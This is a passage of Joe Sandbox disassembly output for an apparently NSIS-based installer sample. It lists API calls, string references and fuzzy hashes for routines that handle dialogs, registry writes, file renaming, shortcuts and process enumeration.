                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: F$A
                                                                                                                                                                                                                                                                                                    • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                    • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                    • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                    • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                    • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                    • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                    • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                    • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                    • String ID: F$N$open
                                                                                                                                                                                                                                                                                                    • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                    • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                    • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                    • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                    • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                    • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                    • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042777E,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FE6
